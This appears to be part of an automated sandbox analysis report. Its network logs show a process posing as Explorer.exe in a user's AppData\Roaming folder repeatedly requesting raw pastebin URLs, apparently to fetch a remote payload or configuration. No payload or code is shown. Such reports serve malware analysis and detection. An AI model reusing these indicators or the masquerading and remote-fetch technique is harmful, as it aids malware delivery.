                                                            Expires: Mon, 09 Dec 2024 14:15:00 GMT
                                                            Location: https://pastebin.com/raw/KKpnJShN
                                                            Server: cloudflare
                                                            CF-RAY: 8ef542f259984364-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            30192.168.2.550039172.67.19.24807356C:\Users\user\AppData\Roaming\Explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 9, 2024 14:15:06.222625017 CET74OUTGET /raw/hbwHfEg3 HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Dec 9, 2024 14:15:07.324852943 CET472INHTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:15:07 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:15:07 GMT
                                                            Location: https://pastebin.com/raw/hbwHfEg3
                                                            Server: cloudflare
                                                            CF-RAY: 8ef54319b9474405-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                            Dec 9, 2024 14:15:07.325525999 CET50OUTGET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                            Dec 9, 2024 14:15:07.647357941 CET472INHTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:15:07 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:15:07 GMT
                                                            Location: https://pastebin.com/raw/KKpnJShN
                                                            Server: cloudflare
                                                            CF-RAY: 8ef5431bcbab4405-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            31192.168.2.550041172.67.19.24807356C:\Users\user\AppData\Roaming\Explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 9, 2024 14:15:12.782363892 CET74OUTGET /raw/hbwHfEg3 HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Dec 9, 2024 14:15:13.880243063 CET472INHTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:15:13 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:15:13 GMT
                                                            Location: https://pastebin.com/raw/hbwHfEg3
                                                            Server: cloudflare
                                                            CF-RAY: 8ef54342ace3c45c-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            32192.168.2.550043172.67.19.24807356C:\Users\user\AppData\Roaming\Explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 9, 2024 14:15:14.006746054 CET74OUTGET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Dec 9, 2024 14:15:15.101675034 CET472INHTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:15:14 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:15:14 GMT
                                                            Location: https://pastebin.com/raw/KKpnJShN
                                                            Server: cloudflare
                                                            CF-RAY: 8ef5434a5ef8422e-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            33192.168.2.550045172.67.19.24807356C:\Users\user\AppData\Roaming\Explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 9, 2024 14:15:20.238331079 CET74OUTGET /raw/hbwHfEg3 HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Dec 9, 2024 14:15:21.386061907 CET472INHTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:15:21 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:15:21 GMT
                                                            Location: https://pastebin.com/raw/hbwHfEg3
                                                            Server: cloudflare
                                                            CF-RAY: 8ef543719e9e7292-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            34192.168.2.550047172.67.19.24807356C:\Users\user\AppData\Roaming\Explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 9, 2024 14:15:21.509484053 CET50OUTGET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                            Dec 9, 2024 14:15:22.617626905 CET472INHTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:15:22 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:15:22 GMT
                                                            Location: https://pastebin.com/raw/KKpnJShN
                                                            Server: cloudflare
                                                            CF-RAY: 8ef5437949048ce8-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            35192.168.2.550049172.67.19.24807356C:\Users\user\AppData\Roaming\Explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 9, 2024 14:15:28.766935110 CET74OUTGET /raw/hbwHfEg3 HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Dec 9, 2024 14:15:29.864563942 CET472INHTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:15:29 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:15:29 GMT
                                                            Location: https://pastebin.com/raw/hbwHfEg3
                                                            Server: cloudflare
                                                            CF-RAY: 8ef543a69a9d5e6d-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            36192.168.2.550051172.67.19.24807356C:\Users\user\AppData\Roaming\Explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 9, 2024 14:15:29.986428022 CET74OUTGET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Dec 9, 2024 14:15:31.081731081 CET472INHTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:15:30 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:15:30 GMT
                                                            Location: https://pastebin.com/raw/KKpnJShN
                                                            Server: cloudflare
                                                            CF-RAY: 8ef543ae3ab74252-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            37192.168.2.550053172.67.19.24807356C:\Users\user\AppData\Roaming\Explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 9, 2024 14:15:36.528752089 CET50OUTGET /raw/hbwHfEg3 HTTP/1.1
                                                            Host: pastebin.com
                                                            Dec 9, 2024 14:15:37.636913061 CET472INHTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:15:37 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:15:37 GMT
                                                            Location: https://pastebin.com/raw/hbwHfEg3
                                                            Server: cloudflare
                                                            CF-RAY: 8ef543d72945558a-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                            Dec 9, 2024 14:15:37.637427092 CET50OUTGET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                            Dec 9, 2024 14:15:38.119513035 CET472INHTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:15:37 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:15:37 GMT
                                                            Location: https://pastebin.com/raw/KKpnJShN
                                                            Server: cloudflare
                                                            CF-RAY: 8ef543da0bbd558a-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            38192.168.2.550054172.67.19.24807356C:\Users\user\AppData\Roaming\Explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 9, 2024 14:15:43.261617899 CET50OUTGET /raw/hbwHfEg3 HTTP/1.1
                                                            Host: pastebin.com
                                                            Dec 9, 2024 14:15:44.360963106 CET472INHTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:15:44 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:15:44 GMT
                                                            Location: https://pastebin.com/raw/hbwHfEg3
                                                            Server: cloudflare
                                                            CF-RAY: 8ef544012ce86a5c-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                            Dec 9, 2024 14:15:44.362515926 CET50OUTGET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                            Dec 9, 2024 14:15:44.684132099 CET472INHTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:15:44 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:15:44 GMT
                                                            Location: https://pastebin.com/raw/KKpnJShN
                                                            Server: cloudflare
                                                            CF-RAY: 8ef544033f6a6a5c-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            39192.168.2.550056172.67.19.24807356C:\Users\user\AppData\Roaming\Explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 9, 2024 14:15:49.812793016 CET74OUTGET /raw/hbwHfEg3 HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Dec 9, 2024 14:15:50.940239906 CET472INHTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:15:50 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:15:50 GMT
                                                            Location: https://pastebin.com/raw/hbwHfEg3
                                                            Server: cloudflare
                                                            CF-RAY: 8ef5442a5b8bde96-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                            Dec 9, 2024 14:15:50.940969944 CET50OUTGET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                            Dec 9, 2024 14:15:51.260962009 CET472INHTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:15:51 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:15:51 GMT
                                                            Location: https://pastebin.com/raw/KKpnJShN
                                                            Server: cloudflare
                                                            CF-RAY: 8ef5442c58f4de96-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            40192.168.2.550057172.67.19.24807356C:\Users\user\AppData\Roaming\Explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 9, 2024 14:15:56.391242981 CET74OUTGET /raw/hbwHfEg3 HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Dec 9, 2024 14:15:57.489962101 CET472INHTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:15:57 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:15:57 GMT
                                                            Location: https://pastebin.com/raw/hbwHfEg3
                                                            Server: cloudflare
                                                            CF-RAY: 8ef544534c1742c3-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                            Dec 9, 2024 14:15:57.495171070 CET50OUTGET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                            Dec 9, 2024 14:15:57.819231987 CET472INHTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:15:57 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:15:57 GMT
                                                            Location: https://pastebin.com/raw/KKpnJShN
                                                            Server: cloudflare
                                                            CF-RAY: 8ef544555ef042c3-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            HTTPS Proxied Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.549705172.67.19.244437356C:\Users\user\AppData\Roaming\Explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-09 13:12:11 UTC74OUTGET /raw/hbwHfEg3 HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            2024-12-09 13:12:12 UTC391INHTTP/1.1 200 OK
                                                            Date: Mon, 09 Dec 2024 13:12:12 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-frame-options: DENY
                                                            x-content-type-options: nosniff
                                                            x-xss-protection: 1;mode=block
                                                            cache-control: public, max-age=1801
